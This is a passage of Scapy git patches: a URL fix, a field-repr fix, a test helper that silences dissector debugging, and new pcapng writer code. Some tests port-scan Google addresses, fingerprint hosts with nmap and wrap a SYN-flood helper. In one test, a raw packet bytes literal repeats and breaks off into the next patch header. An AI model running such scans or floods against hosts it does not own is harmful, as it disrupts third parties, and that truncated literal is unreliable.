a/.github/ISSUE_TEMPLATE/BUGS.yml b/.github/ISSUE_TEMPLATE/BUGS.yml index 7d4f81c0e59..d70a370ff30 100644 --- a/.github/ISSUE_TEMPLATE/BUGS.yml +++ b/.github/ISSUE_TEMPLATE/BUGS.yml @@ -6,7 +6,7 @@ body: value: | ### Things to consider 1. Please check that you are using the **latest Scapy version**, e.g. installed via: - `pip install --upgrade git+git://github.com/secdev/scapy` + `pip install --upgrade git+https://github.com/secdev/scapy.git` 2. If you are here to ask a question - please check previous issues and online resources, and consider using Gitter instead: 3. Please understand that **this is not a forum** but an issue tracker. The following article explains why you should limit questions asked on Github issues: From e0c96c5251e000a0099883944f6009644f2b605a Mon Sep 17 00:00:00 2001 From: Pierre Date: Sat, 23 Apr 2022 22:42:31 +0200 Subject: [PATCH 0774/1632] Fix Str*Field().i2repr() with random / fuzzed values (#3589) --- scapy/fields.py | 17 +++++++++-------- test/fields.uts | 15 +++++++++++++++ 2 files changed, 24 insertions(+), 8 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 0cfc81ac2ab..c8c69d8b070 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1811,19 +1811,20 @@ class XStrField(StrField): def i2repr(self, pkt, x): # type: (Optional[Packet], bytes) -> str - if x is None: - return repr(x) - return bytes_hex(x).decode() + if isinstance(x, bytes): + return bytes_hex(x).decode() + return super(XStrField, self).i2repr(pkt, x) class _XStrLenField: def i2repr(self, pkt, x): # type: (Optional[Packet], bytes) -> str - if not x: - return repr(x) - return bytes_hex( - x[:(self.length_from or (lambda x: 0))(pkt)] # type: ignore - ).decode() + if isinstance(x, bytes): + return bytes_hex( + x[:(self.length_from or (lambda x: 0))(pkt)] # type: ignore + ).decode() + # cannot use super() since _XStrLenField does not inherit from Field + return Field.i2repr(self, pkt, x) class XStrLenField(_XStrLenField, StrLenField): diff --git a/test/fields.uts b/test/fields.uts index 1a770f00b11..6641527f105 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -2102,3 +2102,18 @@ assert isinstance(p.packet.short1, RandShort) assert isinstance(p.packet.byte, RandByte) assert isinstance(p.packet.long, RandLong) assert isinstance(p.short2, RandShort) + +############ +############ ++ XStr(*)Field tests + += i2repr +~ field xstrfield + +from collections import namedtuple +MockPacket = namedtuple('MockPacket', ['type']) + +mp = MockPacket(0) +f = XStrField('test', None) +x = f.i2repr(mp, RandBin()) +assert x == '' From 1fc454380c00653a3654de0687a33d35cd4566d1 Mon Sep 17 00:00:00 2001 From: Ajay Mishra Date: Fri, 29 Apr 2022 16:05:32 +0530 Subject: [PATCH 0775/1632] Changed the hyperlink of Vpython-jupyter (#3593) --- doc/scapy/installation.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/installation.rst b/doc/scapy/installation.rst index 8145f843a9e..165a9d36e9b 100644 --- a/doc/scapy/installation.rst +++ b/doc/scapy/installation.rst @@ -140,7 +140,7 @@ Here are the topics involved and some examples that you can use to try if your i .. note:: ``Graphviz`` and ``ImageMagick`` need to be installed separately, using your platform-specific package manager. -* 3D graphics. ``trace3D()`` needs `VPython-Jupyter `_. +* 3D graphics. ``trace3D()`` needs `VPython-Jupyter `_. VPython-Jupyter is installable via ``pip install vpython`` From 53c764d71147497f8088d30a441f5dd7a4e9be57 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 2 May 2022 10:51:13 +0200 Subject: [PATCH 0776/1632] No-debug-dissector in UTscapy - stabilize (#3563) * No-debug-dissector in UTScapy - stabilize nmap * Disable tox --paralell on windows --- .appveyor.yml | 2 +- scapy/tools/UTscapy.py | 12 ++++++++ test/linux.uts | 7 ++--- test/nmap.uts | 16 +++++++--- test/regression.uts | 54 ++++++++++++--------------------- test/scapy/layers/dns_edns0.uts | 6 ++-- test/scapy/layers/radius.uts | 6 ++-- test/tls.uts | 36 +++++++--------------- 8 files changed, 63 insertions(+), 76 deletions(-) diff --git a/.appveyor.yml b/.appveyor.yml index fa2c97e6f71..e928127428d 100644 --- a/.appveyor.yml +++ b/.appveyor.yml @@ -66,7 +66,7 @@ test_script: - set TOX_PARALLEL_NO_SPINNER=1 # Main unit tests - - "%PYTHON%\\python -m tox --parallel -- %UT_FLAGS%" + - "%PYTHON%\\python -m tox -- %UT_FLAGS%" after_test: # Run codecov diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index 0b5da233d48..f02fcbfa403 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -93,6 +93,17 @@ def scapy_path(fname): os.path.dirname(__file__), '../../', fname )) + +class no_debug_dissector: + """Context object used to disable conf.debug_dissector""" + def __enter__(self): + self.old_dbg = conf.debug_dissector + conf.debug_dissector = False + + def __exit__(self, exc_type, exc_value, traceback): + conf.debug_dissector = self.old_dbg + + # Import tool # @@ -570,6 +581,7 @@ def import_UTscapy_tools(ses): ses["Bunch"] = Bunch ses["retry_test"] = retry_test ses["scapy_path"] = scapy_path + ses["no_debug_dissector"] = no_debug_dissector if WINDOWS: from scapy.arch.windows import _route_add_loopback _route_add_loopback() diff --git a/test/linux.uts b/test/linux.uts index 1a9733289c9..bd1bc2245da 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -12,11 +12,10 @@ ~ netaccess IP TCP linux needs_root old_l3socket = conf.L3socket -old_debug_dissector = conf.debug_dissector -conf.debug_dissector = False conf.L3socket = L3RawSocket -x = sr1(IP(dst="www.google.com")/TCP(sport=RandShort(), dport=80, flags="S"),timeout=3) -conf.debug_dissector = old_debug_dissector +with no_debug_dissector(): + x = sr1(IP(dst="www.google.com")/TCP(sport=RandShort(), dport=80, flags="S"),timeout=3) + conf.L3socket = old_l3socket x assert x[IP].ottl() in [32, 64, 128, 255] diff --git a/test/nmap.uts b/test/nmap.uts index 8003b5f2423..d71c86b136c 100644 --- a/test/nmap.uts +++ b/test/nmap.uts @@ -44,14 +44,18 @@ assert len(conf.nmap_kdb.get_base()) > 100 = fingerprint test: www.secdev.org ~ netaccess needs_root -score, fprint = nmap_fp('www.secdev.org') +with no_debug_dissector(): + score, fprint = nmap_fp('www.secdev.org') + print(score, fprint) assert score > 0.5 assert fprint = fingerprint test: gateway ~ netaccess needs_root -score, fprint = nmap_fp(conf.route.route('0.0.0.0')[2]) +with no_debug_dissector(): + score, fprint = nmap_fp(conf.route.route('0.0.0.0')[2]) + print(score, fprint) assert score > 0.5 assert fprint @@ -61,7 +65,9 @@ assert fprint import re as re_ -a = nmap_sig("www.secdev.org", 80, 81) +with no_debug_dissector(): + a = nmap_sig("www.secdev.org", 80, 81) + a for x in nmap_sig2txt(a).split("\n"): assert re_.match(r"\w{2,4}\(.*\)", x) @@ -69,7 +75,9 @@ for x in nmap_sig2txt(a).split("\n"): = nmap_udppacket_sig test: www.google.com ~ netaccess needs_root -a = nmap_sig("www.google.com", ucport=80) +with no_debug_dissector(): + a = nmap_sig("www.google.com", ucport=80) + assert len(a) > 3 assert len(a["PU"]) > 0 diff --git a/test/regression.uts b/test/regression.uts index cb89d79a289..94649cc6cac 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1365,10 +1365,8 @@ assert ssid == "ROUTE-821E295" = Sending and receiving an ICMP ~ netaccess needs_root IP ICMP icmp_firewall def _test(): - old_debug_dissector = conf.debug_dissector - conf.debug_dissector = False - x = sr1(IP(dst="www.google.com")/ICMP(),timeout=3) - conf.debug_dissector = old_debug_dissector + with no_debug_dissector(): + x = sr1(IP(dst="www.google.com")/ICMP(),timeout=3) x assert x[IP].ottl() in [32, 64, 128, 255] assert 0 <= x[IP].hops() <= 126 @@ -1451,14 +1449,12 @@ retry_test(_test) from functools import partial # flooding methods do not support timeout. Packing the test for security def _test_flood(ip, flood_function, add_ether=False): - old_debug_dissector = conf.debug_dissector - conf.debug_dissector = False - p = IP(dst=ip)/TCP(sport=RandShort(), dport=80, flags="S") - if add_ether: - p = Ether()/p - p.show2() - x = flood_function(p, timeout=0.5, maxretries=10) - conf.debug_dissector = old_debug_dissector + with no_debug_dissector(): + p = IP(dst=ip)/TCP(sport=RandShort(), dport=80, flags="S") + if add_ether: + p = Ether()/p + p.show2() + x = flood_function(p, timeout=0.5, maxretries=10) if type(x) == tuple: x = x[0][0][1] x @@ -1495,10 +1491,8 @@ finally: = Sending and receiving an ICMPv6EchoRequest ~ netaccess ipv6 def _test(): - old_debug_dissector = conf.debug_dissector - conf.debug_dissector = False - x = sr1(IPv6(dst="www.google.com")/ICMPv6EchoRequest(),timeout=3) - conf.debug_dissector = old_debug_dissector + with no_debug_dissector(): + x = sr1(IPv6(dst="www.google.com")/ICMPv6EchoRequest(),timeout=3) x assert x[IPv6].ottl() in [32, 64, 128, 255] assert 0 <= x[IPv6].hops() <= 126 @@ -1630,10 +1624,8 @@ assert a.sent_time is None = Port scan ~ netaccess needs_root IP TCP def _test(): - old_debug_dissector = conf.debug_dissector - conf.debug_dissector = False - ans,unans=sr(IP(dst="www.google.com/30")/TCP(dport=[80,443]), timeout=2) - conf.debug_dissector = old_debug_dissector + with no_debug_dissector(): + ans,unans=sr(IP(dst="www.google.com/30")/TCP(dport=[80,443]), timeout=2) # Backward compatibility: Python 2 only if six.PY2: @@ -1649,13 +1641,11 @@ retry_test(_test) def _test(): old_debug_match = conf.debug_match conf.debug_match = True - old_debug_dissector = conf.debug_dissector - conf.debug_dissector = False - ans, unans = sr(IP(dst="www.google.fr") / TCP(sport=RandShort(), dport=80, flags="S"), timeout=2) - assert ans[0].query == ans[0][0] - assert ans[0].answer == ans[0][1] + with no_debug_dissector(): + ans, unans = sr(IP(dst="www.google.fr") / TCP(sport=RandShort(), dport=80, flags="S"), timeout=2) + assert ans[0].query == ans[0][0] + assert ans[0].answer == ans[0][1] conf.debug_match = old_debug_match - conf.debug_dissector = old_debug_dissector assert ans and not unans retry_test(_test) @@ -1663,10 +1653,8 @@ retry_test(_test) = Send & receive with retry ~ netaccess needs_root IP ICMP def _test(): - old_debug_dissector = conf.debug_dissector - conf.debug_dissector = False - ans, unans = sr(IP(dst=["8.8.8.8", "1.2.3.4"]) / TCP(sport=RandShort(), dport=53, flags="S"), timeout=2, retry=1) - conf.debug_dissector = old_debug_dissector + with no_debug_dissector(): + ans, unans = sr(IP(dst=["8.8.8.8", "1.2.3.4"]) / TCP(sport=RandShort(), dport=53, flags="S"), timeout=2, retry=1) assert len(ans) == 1 and len(unans) == 1 retry_test(_test) @@ -1674,10 +1662,8 @@ retry_test(_test) = Send & receive with multi ~ netaccess needs_root IP ICMP def _test(): - old_debug_dissector = conf.debug_dissector - conf.debug_dissector = False - ans, unans = sr(IP(dst=["8.8.8.8", "1.2.3.4"]) / TCP(sport=RandShort(), dport=53, flags="S"), timeout=2, multi=1) - conf.debug_dissector = old_debug_dissector + with no_debug_dissector(): + ans, unans = sr(IP(dst=["8.8.8.8", "1.2.3.4"]) / TCP(sport=RandShort(), dport=53, flags="S"), timeout=2, multi=1) assert len(ans) >= 1 and len(unans) == 1 retry_test(_test) diff --git a/test/scapy/layers/dns_edns0.uts b/test/scapy/layers/dns_edns0.uts index ba225bf1dab..d35871b9c86 100644 --- a/test/scapy/layers/dns_edns0.uts +++ b/test/scapy/layers/dns_edns0.uts @@ -64,10 +64,8 @@ raw(tlv) == b'\x00\x02\x00\x00' ~ netaccess needs_root def _test(): - old_debug_dissector = conf.debug_dissector - conf.debug_dissector = False - r = sr1(IP(dst="l.root-servers.net")/UDP()/DNS(qd=[DNSQR(qtype="SOA", qname=".")], ar=[DNSRROPT(z=0, rdata=[EDNS0TLV(optcode="NSID")])]), timeout=1) - conf.debug_dissector = old_debug_dissector + with no_debug_dissector(): + r = sr1(IP(dst="l.root-servers.net")/UDP()/DNS(qd=[DNSQR(qtype="SOA", qname=".")], ar=[DNSRROPT(z=0, rdata=[EDNS0TLV(optcode="NSID")])]), timeout=1) len(r.ar) and DNSRROPT in r.ar and len(r.ar[DNSRROPT].rdata) and len([x for x in r.ar[DNSRROPT].rdata if x.optcode == 3]) retry_test(_test) diff --git a/test/scapy/layers/radius.uts b/test/scapy/layers/radius.uts index 325b8513ec8..5c8d254213c 100644 --- a/test/scapy/layers/radius.uts +++ b/test/scapy/layers/radius.uts @@ -221,12 +221,10 @@ assert pkt.attributes[2].type == 24 assert pkt.attributes[2].len == 18 conf.contribs.setdefault("radius", {})["auto-defrag"] = False -_od = conf.debug_dissector -conf.debug_dissector = False -pkt = Radius(s) +with no_debug_dissector(): + pkt = Radius(s) -conf.debug_dissector = _od assert len(pkt.attributes) == 4 assert pkt.attributes[0].type == 79 assert pkt.attributes[1].type == 79 diff --git a/test/tls.uts b/test/tls.uts index a676d53207f..3161b307b69 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -1104,11 +1104,9 @@ from scapy.layers.tls.record import _TLSMsgListField # Unknown type assert isinstance(_TLSMsgListField.m2i(_TLSMsgListField("", []), TLS(type=0), b'\x00\x03\x03\x00\x03abc'), Raw) -old_debug_dissector = conf.debug_dissector -conf.debug_dissector = False -# not even bytes to make it crash -assert isinstance(_TLSMsgListField.m2i(_TLSMsgListField("", []), TLS(type=20), 1), Raw) -conf.debug_dissector = old_debug_dissector +with no_debug_dissector(): + # not even bytes to make it crash + assert isinstance(_TLSMsgListField.m2i(_TLSMsgListField("", []), TLS(type=20), 1), Raw) = Test x25519 dissection in ServerKeyExchange @@ -1350,13 +1348,9 @@ test_tls_without_cryptography() = Truncated TCP segment -dd = conf.debug_dissector -conf.debug_dissector = False - -pkt = Ether(hex_bytes('00155dfb587a00155dfb58430800450005dc54d3400070065564400410d40a00000d01bb044e8b86744e16063ac45010faf06ba9000016030317c30200005503035cb336a067d53a5d2cedbdfec666ac740afbd0637ddd13eddeab768c3c63abee20981a0000d245f1c905b329323ad67127cd4b907a49f775c331d0794149aca7cdc02800000d0005000000170000ff010001000b000ec6000ec300090530820901308206e9a00302010202132000036e72aded906765595fae000000036e72300d06092a864886f70d01010b050030818b310b30090603550406130255533113')) -assert TLSServerHello in pkt - -conf.debug_dissector = dd +with no_debug_dissector(): + pkt = Ether(hex_bytes('00155dfb587a00155dfb58430800450005dc54d3400070065564400410d40a00000d01bb044e8b86744e16063ac45010faf06ba9000016030317c30200005503035cb336a067d53a5d2cedbdfec666ac740afbd0637ddd13eddeab768c3c63abee20981a0000d245f1c905b329323ad67127cd4b907a49f775c331d0794149aca7cdc02800000d0005000000170000ff010001000b000ec6000ec300090530820901308206e9a00302010202132000036e72aded906765595fae000000036e72300d06092a864886f70d01010b050030818b310b30090603550406130255533113')) + assert TLSServerHello in pkt ############################################################################### ########################### TLS Misc tests #################################### @@ -1482,13 +1476,9 @@ assert raw(p) == a = Issue 2763 -dd = conf.debug_dissector -conf.debug_dissector = False - -p = Ether(b'RU\x10\x00\x02\x02RT\x00\x124V\x08\x00E\x00\x05\xc8\r\xd8\x00\x00@\x06\x96\x9d\x9c&\xce\x12\xc0\xa8\xa5\xd9\x01\xbb\xc0\x1f\x00w$\x02\x03\xbe\xc5#P\x10#(\x0b\x9e\x00\x00\x16\x03\x03\x0e4\x02\x00\x00M\x03\x03^\xfa\xb5~\x88\xdf\xdc#}\'\xa0\xff\xa2\xe2\xb5\xec\x0e\x93\xa8\xe0\xde\x01[\x13[F\x151 x\xc6\xcc `)\x00\x00\x8aZ\x90l\xda\x0b\xe1\xec[i\x13\xa7\x8e\xb9a\x98"\x8a7L\x9d\x90\xe0\x01\x06c$9\xc0\'\x00\x00\x05\xff\x01\x00\x01\x00\x0b\x00\x0c\x8e\x00\x0c\x8b\x00\x06n0\x82\x06j0\x82\x05R\xa0\x03\x02\x01\x02\x02\x10EY\xe8\x1c\x1e\x9a\xe0?X\xaa\xc3\xbc\xcd`jh0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x0b\x05\x000\x81\x8f1\x0b0\t\x06\x03U\x04\x06\x13\x02GB1\x1b0\x19\x06\x03U\x04\x08\x13\x12Greater Manchester1\x100\x0e\x06\x03U\x04\x07\x13\x07Salford1\x180\x16\x06\x03U\x04\n\x13\x0fSectigo Limited1705\x06\x03U\x04\x03\x13.Sectigo RSA Domain Validation Secure Server CA0\x1e\x17\r190309000000Z\x17\r210308235959Z0W1!0\x1f\x06\x03U\x04\x0b\x13\x18Domain Control Validated1\x1d0\x1b\x06\x03U\x04\x0b\x13\x14PositiveSSL Wildcard1\x130\x11\x06\x03U\x04\x03\x0c\n*.mql5.net0\x82\x01"0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x82\x01\x0f\x000\x82\x01\n\x02\x82\x01\x01\x00\xcb\xbcn=\xbaGd\xe1XB\x07\xc9\xb1\xc8/\x86\xaa4Z\xbdNk\xfb\xffR\x8f\xe4\x1c^\x91m8\xb9^\x97\xa5\xd3N\xfb\x80\x92\x8ap\xda\x15\x9f\xee\xe7\xb3\xc8?\xb0>~\xaa\x07\x91\xb1\x99q\xe2\xe5\xc8\x9b\x1d5\xa0\x96,\x98\xdaW\x93\x95\x8e%\xe8\xd4L\xeb\xcbSg\x15"\xba\xb7\xc7\x1f\xe9\xd6\x1a\xe6E\x1d\xc8\x1e%\xd36\xe0/r\xd1\xce1C\xce\x91&\xa1\x08*R\xbf\x8cu\xb0\xda\x0e\x1e2\xd66\x1df&3\x9b\x03\x0b\xcam:\xf7\x12\xd9ud(\xae\xdc\xbci\x85\xbd\xcf\xeb{\x15:\xbd\x0e\x11\x1bi\xd8\xff]y~E\x15\x95\xee\xe9\xea\xc6Cr~\xaa\x07\x91\xb1\x99q\xe2\xe5\xc8\x9b\x1d5\xa0\x96,\x98\xdaW\x93\x95\x8e%\xe8\xd4L\xeb\xcbSg\x15"\xba\xb7\xc7\x1f\xe9\xd6\x1a\xe6E\x1d\xc8\x1e%\xd36\xe0/r\xd1\xce1C\xce\x91&\xa1\x08*R\xbf\x8cu\xb0\xda\x0e\x1e2\xd66\x1df&3\x9b\x03\x0b\xcam:\xf7\x12\xd9ud(\xae\xdc\xbci\x85\xbd\xcf\xeb{\x15:\xbd\x0e\x11\x1bi\xd8\xff]y~E\x15\x95\xee\xe9\xea\xc6Cr~\xaa\x07\x91\xb1\x99q\xe2\xe5\xc8\x9b\x1d5\xa0\x96,\x98\xdaW\x93\x95\x8e%\xe8\xd4L\xeb\xcbSg\x15"\xba\xb7\xc7\x1f\xe9\xd6\x1a\xe6E\x1d\xc8\x1e%\xd36\xe0/r\xd1\xce1C\xce\x91&\xa1\x08*R\xbf\x8cu\xb0\xda\x0e\x1e2\xd66\x1df&3\x9b\x03\x0b\xcam:\xf7\x12\xd9ud(\xae\xdc\xbci\x85\xbd\xcf\xeb{\x15:\xbd\x0e\x11\x1bi\xd8\xff]y~E\x15\x95\xee\xe9\xea\xc6Cr~\xaa\x07\x91\xb1\x99q\xe2\xe5\xc8\x9b\x1d5\xa0\x96,\x98\xdaW\x93\x95\x8e%\xe8\xd4L\xeb\xcbSg\x15"\xba\xb7\xc7\x1f\xe9\xd6\x1a\xe6E\x1d\xc8\x1e%\xd36\xe0/r\xd1\xce1C\xce\x91&\xa1\x08*R\xbf\x8cu\xb0\xda\x0e\x1e2\xd66\x1df&3\x9b\x03\x0b\xcam:\xf7\x12\xd9ud(\xae\xdc\xbci\x85\xbd\xcf\xeb{\x15:\xbd\x0e\x11\x1bi\xd8\xff]y~E\x15\x95\xee\xe9\xea\xc6Cr Date: Thu, 5 May 2022 20:05:36 +0200 Subject: [PATCH 0777/1632] Basic pcapng writing support (#3588) --- scapy/utils.py | 488 ++++++++++++++++++++++++++++++++------------ test/regression.uts | 40 +++- 2 files changed, 394 insertions(+), 134 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index cd0f7a4cb0a..dfa2081282c 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1102,6 +1102,24 @@ def wrpcap(filename, # type: Union[IO[bytes], str] fdesc.write(pkt) +@conf.commands.register +def wrpcapng(filename, # type: str + pkt, # type: _PacketIterable + ): + # type: (...) -> None + """Write a list of packets to a pcapng file + + :param filename: the name of the file to write packets to, or an open, + writable file-like object. The file descriptor will be + closed at the end of the call, so do not use an object you + do not want to close (e.g., running wrpcapng(sys.stdout, []) + in interactive mode will crash Scapy). + :param pkt: packets to write + """ + with PcapNgWriter(filename) as fdesc: + fdesc.write(pkt) + + @conf.commands.register def rdpcap(filename, count=-1): # type: (Union[IO[bytes], str], int) -> PacketList @@ -1701,7 +1719,167 @@ def recv(self, size=MTU): return self.read_packet() -class RawPcapWriter(object): +class GenericPcapWriter(object): + nano = False + linktype = None # type: Optional[int] + + def _write_header(self, pkt): + # type: (Optional[Union[Packet, bytes]]) -> None + raise NotImplementedError + + def _write_packet(self, + packet, # type: Union[bytes, Packet] + sec=None, # type: Optional[float] + usec=None, # type: Optional[int] + caplen=None, # type: Optional[int] + wirelen=None # type: Optional[int] + ): + # type: (...) -> None + raise NotImplementedError + + def _get_time(self, + packet, # type: Union[bytes, Packet] + sec, # type: Optional[float] + usec # type: Optional[int] + ): + # type: (...) -> Tuple[float, int] + if hasattr(packet, "time"): + if sec is None: + packet_time = packet.time # type: ignore + tmp = int(packet_time) + usec = int(round((packet_time - tmp) * + (1000000000 if self.nano else 1000000))) + sec = float(packet_time) + if sec is not None and usec is None: + usec = 0 + return sec, usec # type: ignore + + def write_header(self, pkt): + # type: (Optional[Union[Packet, bytes]]) -> None + if self.linktype is None: + try: + if pkt is None or isinstance(pkt, bytes): + # Can't guess LL + raise KeyError + self.linktype = conf.l2types.layer2num[ + pkt.__class__ + ] + except KeyError: + msg = "%s: unknown LL type for %s. Using type 1 (Ethernet)" + warning(msg, self.__class__.__name__, pkt.__class__.__name__) + self.linktype = DLT_EN10MB + self._write_header(pkt) + + def write_packet(self, + packet, # type: Union[bytes, Packet] + sec=None, # type: Optional[float] + usec=None, # type: Optional[int] + caplen=None, # type: Optional[int] + wirelen=None, # type: Optional[int] + ): + # type: (...) -> None + """ + Writes a single packet to the pcap file. + + :param packet: Packet, or bytes for a single packet + :type packet: scapy.packet.Packet or bytes + :param sec: time the packet was captured, in seconds since epoch. If + not supplied, defaults to now. + :type sec: float + :param usec: If ``nano=True``, then number of nanoseconds after the + second that the packet was captured. If ``nano=False``, + then the number of microseconds after the second the + packet was captured. If ``sec`` is not specified, + this value is ignored. + :type usec: int or long + :param caplen: The length of the packet in the capture file. If not + specified, uses ``len(raw(packet))``. + :type caplen: int + :param wirelen: The length of the packet on the wire. If not + specified, tries ``packet.wirelen``, otherwise uses + ``caplen``. + :type wirelen: int + :return: None + :rtype: None + """ + f_sec, usec = self._get_time(packet, sec, usec) + + rawpkt = bytes_encode(packet) + caplen = len(rawpkt) if caplen is None else caplen + + if wirelen is None: + if hasattr(packet, "wirelen"): + wirelen = packet.wirelen # type: ignore + if wirelen is None: + wirelen = caplen + + self._write_packet( + rawpkt, + sec=f_sec, usec=usec, + caplen=caplen, wirelen=wirelen + ) + + +class GenericRawPcapWriter(GenericPcapWriter): + header_present = False + nano = False + sync = False + f = None # type: Union[IO[bytes], gzip.GzipFile] + + def fileno(self): + # type: () -> int + return -1 if WINDOWS else self.f.fileno() + + def flush(self): + # type: () -> Optional[Any] + return self.f.flush() + + def close(self): + # type: () -> Optional[Any] + if not self.header_present: + self.write_header(None) + return self.f.close() + + def __enter__(self): + # type: () -> GenericRawPcapWriter + return self + + def __exit__(self, exc_type, exc_value, tracback): + # type: (Optional[Any], Optional[Any], Optional[Any]) -> None + self.flush() + self.close() + + def write(self, pkt): + # type: (Union[_PacketIterable, bytes]) -> None + """ + Writes a Packet, a SndRcvList object, or bytes to a pcap file. + + :param pkt: Packet(s) to write (one record for each Packet), or raw + bytes to write (as one record). + :type pkt: iterable[scapy.packet.Packet], scapy.packet.Packet or bytes + """ + if isinstance(pkt, bytes): + if not self.header_present: + self.write_header(pkt) + self.write_packet(pkt) + else: + # Import here to avoid circular dependency + from scapy.supersocket import IterSocket + for p in IterSocket(pkt).iter: + if not self.header_present: + self.write_header(p) + + if not isinstance(p, bytes) and \ + self.linktype != conf.l2types.get(type(p), None): + warning("Inconsistent linktypes detected!" + " The resulting file might contain" + " invalid packets." + ) + + self.write_packet(p) + + +class RawPcapWriter(GenericRawPcapWriter): """A stream PCAP writer with more control than wrpcap()""" def __init__(self, @@ -1732,7 +1910,6 @@ def __init__(self, self.linktype = linktype self.snaplen = snaplen - self.header_present = 0 self.append = append self.gz = gz self.endian = endianness @@ -1754,17 +1931,9 @@ def __init__(self, self.f = filename self.filename = getattr(filename, "name", "No name") - def fileno(self): - # type: () -> int - return -1 if WINDOWS else self.f.fileno() - - def write_header(self, pkt): - # type: (Optional[Union[Packet, bytes]]) -> None - return self._write_header(bytes_encode(pkt)) - def _write_header(self, pkt): # type: (Optional[Union[Packet, bytes]]) -> None - self.header_present = 1 + self.header_present = True if self.append: # Even if prone to race conditions, this seems to be @@ -1791,52 +1960,9 @@ def _write_header(self, pkt): 2, 4, 0, 0, self.snaplen, self.linktype)) self.f.flush() - def write(self, pkt): - # type: (Union[_PacketIterable, bytes]) -> None - """ - Writes a Packet, a SndRcvList object, or bytes to a pcap file. - - :param pkt: Packet(s) to write (one record for each Packet), or raw - bytes to write (as one record). - :type pkt: iterable[scapy.packet.Packet], scapy.packet.Packet or bytes - """ - if isinstance(pkt, bytes): - if not self.header_present: - self.write_header(pkt) - self.write_packet(pkt) - else: - # Import here to avoid circular dependency - from scapy.supersocket import IterSocket - for p in IterSocket(pkt).iter: - if not self.header_present: - self.write_header(p) - - if not isinstance(p, bytes) and \ - self.linktype != conf.l2types.get(type(p), None): - warning("Inconsistent linktypes detected!" - " The resulting PCAP file might contain" - " invalid packets." - ) - - self.write_packet(p) - - def write_packet(self, - packet, # type: Union[bytes, Packet] - sec=None, # type: Optional[int] - usec=None, # type: Optional[int] - caplen=None, # type: Optional[int] - wirelen=None, # type: Optional[int] - ): - # type: (...) -> None - self._write_packet( - bytes(packet), - sec=sec, usec=usec, - caplen=caplen, wirelen=wirelen - ) - def _write_packet(self, - packet, # type: bytes - sec=None, # type: Optional[int] + packet, # type: Union[bytes, Packet] + sec=None, # type: Optional[float] usec=None, # type: Optional[int] caplen=None, # type: Optional[int] wirelen=None # type: Optional[int] @@ -1849,10 +1975,8 @@ def _write_packet(self, :type packet: bytes :param sec: time the packet was captured, in seconds since epoch. If not supplied, defaults to now. - :type sec: int or long - :param usec: If ``nano=True``, then number of nanoseconds after the - second that the packet was captured. If ``nano=False``, - then the number of microseconds after the second the + :type sec: float + :param usec: not used with pcapng packet was captured :type usec: int or long :param caplen: The length of the packet in the capture file. If not @@ -1879,103 +2003,213 @@ def _write_packet(self, usec = 0 self.f.write(struct.pack(self.endian + "IIII", - sec, usec, caplen, wirelen)) + int(sec), usec, caplen, wirelen)) self.f.write(packet) if self.sync: self.f.flush() - def flush(self): - # type: () -> Optional[Any] - return self.f.flush() - def close(self): - # type: () -> Optional[Any] - if not self.header_present: - self.write_header(None) - return self.f.close() +class RawPcapNgWriter(GenericRawPcapWriter): + """A stream pcapng writer with more control than wrpcapng()""" - def __enter__(self): - # type: () -> RawPcapWriter - return self + def __init__(self, + filename, # type: str + ): + # type: (...) -> None - def __exit__(self, exc_type, exc_value, tracback): - # type: (Optional[Any], Optional[Any], Optional[Any]) -> None - self.flush() - self.close() + self.header_present = False + self.tsresol = 1000000 + self.linktype = DLT_EN10MB + # tcpdump only support little-endian in PCAPng files + self.endian = "<" + self.endian_magic = b"\x4d\x3c\x2b\x1a" -class PcapWriter(RawPcapWriter): - """A stream PCAP writer with more control than wrpcap()""" + self.filename = filename + self.f = open(filename, "wb", 4096) + + def _get_time(self, + packet, # type: Union[bytes, Packet] + sec, # type: Optional[float] + usec # type: Optional[int] + ): + # type: (...) -> Tuple[float, int] + if hasattr(packet, "time"): + if sec is None: + sec = float(packet.time) # type: ignore - def write_header(self, pkt): + if usec is None: + usec = 0 + + return sec, usec # type: ignore + + def build_block(self, block_type, block_body): + # type: (bytes, bytes) -> bytes + + # Pad Block Body to 32 bits + if len(block_body) % 4 != 0: + padding = b"\x00" * (4 - len(block_body) % 4) + block_body += padding + + # An empty block is 12 bytes long + block_total_length = 12 + len(block_body) + + # Block Type + block = block_type + # Block Total Length$ + block += struct.pack(self.endian + "I", block_total_length) + # Block Body + block += block_body + # Block Total Length$ + block += struct.pack(self.endian + "I", block_total_length) + + return block + + def _write_header(self, pkt): # type: (Optional[Union[Packet, bytes]]) -> None - if self.linktype is None: - try: - if pkt is None or isinstance(pkt, bytes): - # Can't guess LL - raise KeyError - self.linktype = conf.l2types.layer2num[ - pkt.__class__ - ] - except KeyError: - warning("PcapWriter: unknown LL type for %s. Using type 1 (Ethernet)", pkt.__class__.__name__) # noqa: E501 - self.linktype = DLT_EN10MB - self._write_header(pkt) + if not self.header_present: + self.header_present = True + self._write_block_shb() + self._write_block_idb() - def write_packet(self, - packet, # type: Union[bytes, Packet] - sec=None, # type: Optional[int] - usec=None, # type: Optional[int] - caplen=None, # type: Optional[int] - wirelen=None, # type: Optional[int] - ): + def _write_block_shb(self): + # type: () -> None + + # Block Type + block_type = b"\x0A\x0D\x0D\x0A" + # Byte-Order Magic + block_shb = self.endian_magic + # Major Version + block_shb += struct.pack(self.endian + "H", 1) + # Minor Version + block_shb += struct.pack(self.endian + "H", 0) + # Section Length + block_shb += struct.pack(self.endian + "Q", 0) + + self.f.write(self.build_block(block_type, block_shb)) + + def _write_block_idb(self): + # type: () -> None + + # Block Type + block_type = struct.pack(self.endian + "I", 1) + # LinkType + block_idb = struct.pack(self.endian + "H", self.linktype) + # Reserved + block_idb += struct.pack(self.endian + "H", 0) + # SnapLen + block_idb += struct.pack(self.endian + "I", 262144) + + 